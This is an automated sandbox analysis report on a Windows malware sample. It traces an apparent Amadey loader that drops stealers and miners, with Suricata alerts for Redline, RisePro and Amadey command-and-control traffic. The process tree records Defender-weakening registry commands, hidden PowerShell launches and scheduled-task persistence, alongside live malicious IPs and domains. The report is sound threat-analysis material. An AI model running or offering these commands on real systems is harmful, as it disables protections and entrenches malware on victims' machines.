Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	June 15, 2024, 8:20 a.m.	June 15, 2024, 8:23 a.m.

Size	1.8MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`5a12fd39ea2482c5ef29e1ca1fe5c083`
SHA256	`86d33656765f99e2290c82d877955da93e623584775f1d5dea0249b307aa5489`
CRC32	`6EB1C41A`
ssdeep	`49152:yTWpXiuOiC28Np0gtNcjSXgs7WkFDb0q5ia0:yTWfrC2SersgQBFDb0qEa0`
Yara	PE_Header_Zero - PE File Signature anti_vm_detect - Possibly employs anti-virtualization techniques IsPE32 - (no description)

amadka.exe "C:\Users\test22\AppData\Local\Temp\amadka.exe"
2548
- explortu.exe "C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe"
  2828
  - d7e4153d35.exe "C:\Users\test22\1000015002\d7e4153d35.exe"
    1120
    - axplong.exe "C:\Users\test22\AppData\Local\Temp\8254624243\axplong.exe"
      2232
      - judit.exe "C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe"
        776
      - redline123123.exe "C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe"
        1528
        
        12.exe "C:\Users\test22\AppData\Local\Temp\12.exe"
        1868
        
        MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        2288
      - upd.exe "C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe"
        2780
      - setup222.exe "C:\Users\test22\AppData\Local\Temp\1000025001\setup222.exe"
        800
      - gold.exe "C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe"
        2108
      - lummac2.exe "C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe"
        740
      - onecommander.exe "C:\Users\test22\AppData\Local\Temp\1000060001\onecommander.exe"
        2300
      - drivermanager.exe "C:\Users\test22\AppData\Local\Temp\1000063001\drivermanager.exe"
        3176
        
        MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        3232
      - NewKindR.exe "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe"
        3480
        
        schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewKindR.exe /TR "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" /F
        3540
        
        b2c2c1.exe "C:\Users\test22\AppData\Local\Temp\1000304001\b2c2c1.exe"
        3656
        
        FirstZ.exe "C:\Users\test22\AppData\Local\Temp\1000306001\FirstZ.exe"
        3748
        
        setup.exe "C:\Users\test22\AppData\Local\Temp\1000307001\setup.exe"
        3800
        
        Install.exe .\Install.exe
        3868
        
        Install.exe .\Install.exe /fWdidUCKaz "385134" /S
        3912
        
        cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        4020
        
        forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        1632
        
        cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        3112
        
        reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        3140
        
        forfiles.exe forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        2240
        
        cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        2816
        
        reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        1976
        
        forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        2684
        
        cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        3264
        
        reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        3292
        
        forfiles.exe forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        3372
        
        cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        3552
        
        reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        3576
        
        forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        3696
        
        cmd.exe /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        2148
        
        powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
        3880
        
        gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
        2792
  - a2772ea559.exe "C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe"
    2268
    - schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
      2704
    - schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
      1152
  - db324166b9.exe "C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe"
    2380
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
      2808
      - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef43bf1e8,0x7fef43bf1f8,0x7fef43bf208
        2752
      - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2644 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
        2120
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
xmr-eu1.nanopool.org	A 51.15.58.224 A 141.94.23.83 A 146.59.154.106 A 54.37.232.103 A 163.172.154.142 A 162.19.224.121 A 212.47.253.124 A 54.37.137.114 A 51.15.65.182 A 51.89.23.91 A 51.15.193.130	146.59.154.106
boredombusters.online	A 104.21.44.95 A 172.67.198.131	104.21.44.95
zeph-eu2.nanopool.org	A 51.195.43.17 A 51.15.61.114 A 51.210.150.92 A 51.195.138.197 A 163.172.171.111 A 51.15.89.13 A 51.68.137.186	163.172.171.111
pastebin.com	A 172.67.19.24 A 104.20.4.235 A 104.20.3.235	104.20.3.235
x1.i.lencr.org	CNAME crl.root-x1.letsencrypt.org.edgekey.net CNAME e8652.dscx.akamaiedge.net A 23.41.113.9	23.52.33.11
apps.identrust.com	A 182.162.106.33 A 182.162.106.144 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net	23.210.247.48
ipinfo.io	A 34.117.186.192	34.117.186.192
kmsandallapp.ru	A 31.31.198.35	31.31.198.35
d1i94yju6i4l9g.cloudfront.net	A 18.244.65.161 A 18.244.65.193 A 18.244.65.58 A 18.244.65.92	18.244.65.58
db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	104.26.4.15

IP Address	Status	Action
104.26.5.15	Active	Moloch
147.45.47.126	Active	Moloch
147.45.47.155	Active	Moloch
163.172.154.142	Active	Moloch
164.124.101.2	Active	Moloch
172.67.19.24	Active	Moloch
172.67.198.131	Active	Moloch
18.244.65.161	Active	Moloch
182.162.106.33	Active	Moloch
185.172.128.19	Active	Moloch
185.215.113.67	Active	Moloch
23.41.113.9	Active	Moloch
31.31.198.35	Active	Moloch
34.117.186.192	Active	Moloch
51.15.89.13	Active	Moloch
77.91.77.81	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49165 -> 77.91.77.81:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 77.91.77.81:80 -> 192.168.56.101:49165	2014819	ET INFO Packed Executable Download	Misc activity
TCP 147.45.47.155:80 -> 192.168.56.101:49164	2400022	ET DROP Spamhaus DROP Listed Traffic Inbound group 23	Misc Attack
TCP 77.91.77.81:80 -> 192.168.56.101:49165	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.77.81:80 -> 192.168.56.101:49165	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.77.81:80 -> 192.168.56.101:49165	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49171 -> 77.91.77.81:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 77.91.77.81:80 -> 192.168.56.101:49171	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.77.81:80 -> 192.168.56.101:49171	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.77.81:80 -> 192.168.56.101:49171	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 77.91.77.81:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49170 -> 147.45.47.155:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49164 -> 147.45.47.155:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 77.91.77.81:80 -> 192.168.56.101:49172	2014819	ET INFO Packed Executable Download	Misc activity
TCP 77.91.77.81:80 -> 192.168.56.101:49172	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.77.81:80 -> 192.168.56.101:49172	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.77.81:80 -> 192.168.56.101:49172	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49164 -> 147.45.47.155:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 147.45.47.126:58709 -> 192.168.56.101:49179	2400022	ET DROP Spamhaus DROP Listed Traffic Inbound group 23	Misc Attack
TCP 192.168.56.101:49179 -> 147.45.47.126:58709	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 147.45.47.126:58709 -> 192.168.56.101:49179	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 77.91.77.81:80 -> 192.168.56.101:49165	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.101:49165 -> 77.91.77.81:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49170 -> 147.45.47.155:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49179 -> 147.45.47.126:58709	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	A Network Trojan was detected
TCP 185.215.113.67:40960 -> 192.168.56.101:49183	2400032	ET DROP Spamhaus DROP Listed Traffic Inbound group 33	Misc Attack
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 192.168.56.101:49188 -> 172.67.198.131:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.215.113.67:40960 -> 192.168.56.101:49183	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 185.215.113.67:40960 -> 192.168.56.101:49183	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49229 -> 185.172.128.19:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.101:49229	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.172.128.19:80 -> 192.168.56.101:49229	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.101:49229	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49233 -> 185.172.128.19:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.101:49233	2014819	ET INFO Packed Executable Download	Misc activity
TCP 185.172.128.19:80 -> 192.168.56.101:49233	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.172.128.19:80 -> 192.168.56.101:49233	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.101:49233	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49233 -> 185.172.128.19:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.101:49233 -> 185.172.128.19:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.101:49233	2014819	ET INFO Packed Executable Download	Misc activity
TCP 185.172.128.19:80 -> 192.168.56.101:49233	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.101:49233	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 77.91.77.81:80 -> 192.168.56.101:49172	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49238 -> 18.244.65.161:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49233 -> 185.172.128.19:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49233 -> 185.172.128.19:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49179 -> 147.45.47.126:58709	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	A Network Trojan was detected
TCP 192.168.56.101:49179 -> 147.45.47.126:58709	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49264 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49264 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49264 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 147.45.47.126:58709 -> 192.168.56.101:49179	2046267	ET MALWARE [ANY.RUN] RisePro TCP (External IP)	A Network Trojan was detected
TCP 192.168.56.101:49269 -> 172.67.198.131:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49179 -> 147.45.47.126:58709	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	A Network Trojan was detected
TCP 192.168.56.101:49179 -> 147.45.47.126:58709	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 192.168.56.101:49267 -> 172.67.198.131:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49271 -> 31.31.198.35:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.101:52815 -> 164.124.101.2:53	2033268	ET POLICY Observed DNS Query to Coin Mining Domain (nanopool .org)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49276 -> 172.67.19.24:443	906200068	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (CoinMiner)	undefined
UDP 192.168.56.101:58297 -> 164.124.101.2:53	2033268	ET POLICY Observed DNS Query to Coin Mining Domain (nanopool .org)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49279 -> 172.67.198.131:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49281 -> 172.67.198.131:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49179 -> 147.45.47.126:58709	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	A Network Trojan was detected
TCP 192.168.56.101:49179 -> 147.45.47.126:58709	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 192.168.56.101:49236 -> 172.67.198.131:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49172 -> 77.91.77.81:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49255 -> 172.67.198.131:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49266 -> 104.26.5.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49280 -> 172.67.198.131:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49264 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49188 172.67.198.131:443	C=US, O=Let's Encrypt, CN=E5	CN=boredombusters.online	ae:46:98:37:44:2d:ec:1c:ce:ae:4b:ef:67:3e:b5:93:42:fe:8c:94
TLSv1 192.168.56.101:49238 18.244.65.161:443	C=US, O=Amazon, CN=Amazon RSA 2048 M01	CN=*.cloudfront.net	fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52
TLSv1 192.168.56.101:49269 172.67.198.131:443	C=US, O=Let's Encrypt, CN=E5	CN=boredombusters.online	ae:46:98:37:44:2d:ec:1c:ce:ae:4b:ef:67:3e:b5:93:42:fe:8c:94
TLSv1 192.168.56.101:49267 172.67.198.131:443	C=US, O=Let's Encrypt, CN=E5	CN=boredombusters.online	ae:46:98:37:44:2d:ec:1c:ce:ae:4b:ef:67:3e:b5:93:42:fe:8c:94
TLS 1.2 192.168.56.101:49271 31.31.198.35:443	C=US, O=Let's Encrypt, CN=R11	CN=kmsandallapp.ru	26:c0:93:6a:03:1b:96:aa:25:61:71:21:f5:de:ad:77:51:bf:39:19
TLS 1.3 192.168.56.101:49276 172.67.19.24:443	None	None	None
TLSv1 192.168.56.101:49279 172.67.198.131:443	C=US, O=Let's Encrypt, CN=E5	CN=boredombusters.online	ae:46:98:37:44:2d:ec:1c:ce:ae:4b:ef:67:3e:b5:93:42:fe:8c:94
TLSv1 192.168.56.101:49281 172.67.198.131:443	C=US, O=Let's Encrypt, CN=E5	CN=boredombusters.online	ae:46:98:37:44:2d:ec:1c:ce:ae:4b:ef:67:3e:b5:93:42:fe:8c:94
TLSv1 192.168.56.101:49236 172.67.198.131:443	None	None	None
TLSv1 192.168.56.101:49255 172.67.198.131:443	C=US, O=Let's Encrypt, CN=E5	CN=boredombusters.online	ae:46:98:37:44:2d:ec:1c:ce:ae:4b:ef:67:3e:b5:93:42:fe:8c:94
TLSv1 192.168.56.101:49266 104.26.5.15:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=db-ip.com	1f:af:15:cd:f8:f8:ee:30:f9:6e:6e:54:bc:9a:a7:c7:77:70:6d:25
TLS 1.3 192.168.56.101:49273 51.15.89.13:10943	None	None	None
TLS 1.3 192.168.56.101:49278 163.172.154.142:14433	None	None	None
TLSv1 192.168.56.101:49280 172.67.198.131:443	None	None	None

Queries for the computername (26 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 15, 2024, 8:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
